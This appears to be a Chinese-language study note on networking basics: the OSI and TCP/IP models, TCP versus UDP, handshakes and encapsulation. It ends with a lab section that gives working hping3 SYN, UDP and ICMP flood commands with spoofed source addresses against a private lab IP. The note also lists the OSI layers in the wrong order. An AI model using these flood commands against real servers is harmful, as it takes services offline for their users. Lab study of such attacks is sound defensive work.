网络基础知识二

一、网络通信模型：
网络通信模型的目的：规范不同设备、不同网络之间的通信过程，将网络通信规范化，分层化，模块化，标准化
每一层完成其核心功能，分层传递数据包，最终实现完整的通信过程。

二、OSI模型：
国际化标准组织定义的通信模型，是理论基础。
分为七个层级：物理层、数据链路层、传输层、网络层、会话层、表示层、应用层。

三、TCP/IP四层模型：
由美国国防部提出的精简化通信模型，是互联网通信的实际标准。
分为四层：网络接口层、传输层、网络层、应用层，更契合实际应用。
应用层：为应用程序提供通信接口，处理数据格式，会话管理等 例如 http、https、DNS
传输层：建立端对端可靠或者快速的传输连接，通过端口号区分应用，例如TCP、UDP
网络层：跨网段通信，IP地址快速定位服务器设备 例如：IP、ICMP、ARP、路由器
网络接口层：负责局域网通信以及物理介质的传输由，例如网卡、交换机、以太网协议

四、传输层核心协议：TCP与UDP
1、TCP：传输控制协议
面向连接，通信过程经历三次握手建立连接、四次挥手才断开连接
核心特点：可靠传输，通过序列号、应答确认机制以及重传机制等可以做到流量控制，拥塞控制，从而确保数据不丢失，不重复、按序传输数据
缺点：传输效率低，延迟较高，因为建立连接，确认应答等机制既耗时间也耗资源
工作机制：
三次握手建立连接：
1.客户端发送syn同步报文请求连接
2.服务器响应发送syn同步+ack=1确认报文
3.客户端回复发起ack=1确认报文。建立连接完成
四次挥手断开连接：
1.客户端发送FIN结束报文，请求断开
2.服务器端响应发送ack=1的确认报文
3.服务器端继续发送FIN的结束报文
4.客户端回复ack=1的确认报文，释放连接。需要等数据传输完成。
TCP适用于对可靠性要求高并且可以接受延迟的场景，如 HTTP/HTTPS 、FTP、SMTP 、Mysql等

2、UDP：快速的无连接协议
核心特点：
无连接，通信前无需建立连接，直接发送数据，结束后不需要释放
不可靠，没有序列号，没有确认应答机制，重传机制等等，数据包可能丢失、乱序、重复
优点：传输效率高，延迟低，资源消耗小
适用于实时通信，接受少量数据丢失场景。如视频直播、语音通话、网络游戏

差异性对比：
TCP UDP
连接方式 面向连接(三次握手建立) 无连接(直接发送数据)
传输可靠性 可靠(无丢失、无重复，按序) 不可靠（可能丢失、乱序）
传输效率 低(开销大、延迟高) 高（开销小、延迟低）
典型应用 网页、文件传输、邮件、数据库 视频直播、语音通话、网络游戏

五、总结：
TCP/IP模型是网络通信的实际模型，TCP/UDP是传输层协议，IP、ICMP是网络层协议，HTTP、DNS是应用层协议，构成通信网络的完整体系

应用层https产生数据包》》传输层添加TCP/UDP端口信息标识应用程序》》网络层添加IP地址》》
网络接口层添加对应的MAC地址》》物理介质比特流传输》》接收端反向层层解封装数据包

六、DoS攻击实验：
声明：以下仅在个人靶机实验环境下进行操作，请遵守网络安全法律法规。
DDoS：分布式拒绝服务攻击，一种常见网络攻击手段。控制多个计算机同时向目标服务器发起连接，耗尽目标服务器的资源，从而使其无法为正常的访问提供资源。
DoS：是指单个攻击源发起，耗尽目标服务器的资源使其无法提供正常服务
hping3： 功能强大的网络测试工具，主要用于生成和分析网络数据包，支持TCP、UDP、ICMP等多种协议
**--flood 尽可能快的发送数据包 **
--rand-source 使用随机性的源头IP地址模拟分布式拒绝服务
-p 指定端口
-S 设置TCP SYN标志位，用于SYN扫描或者建立连接
-d 设置数据包数据部分大小

实验一：
SYN洪水攻击：传输层，占满服务器半连接队列
hping3 --flood -S --rand-source -p 80 目标IP地址
1、查询目标服务器cpu资源（资源监视器查看）

2、使用hping3发起SYN洪水攻击

sudo su 
hping3 --flood -S --rand-source -p 80 192.168.100.129

3、再次查看目标服务器cpu资源

实验二：
UDP洪水攻击：传输层，海量垃圾数据包占满带宽
hping3 --flood --udp --rand-source -p 80 目标IP
1、查询目标服务器cpu资源（资源监视器查看）

2、使用hping3发起UDP洪水攻击

sudo su
hping3 --flood --udp --rand-source -p 80 192.168.100.129

3、再次查询目标服务器cpu资源

实验三：
ICMP洪水攻击：网络层，海量的icmp包消耗服务器资源
hping3 --flood --icmp --rand-source -d 1000 目标IP
1、查询目标服务器cpu资源（资源监视器查看）

2、使用hping3发起icmp洪水攻击

sudo su
hping3 --flood --icmp --rand-source -d 500 192.168.100.129

3、再次查询目标服务器cpu资源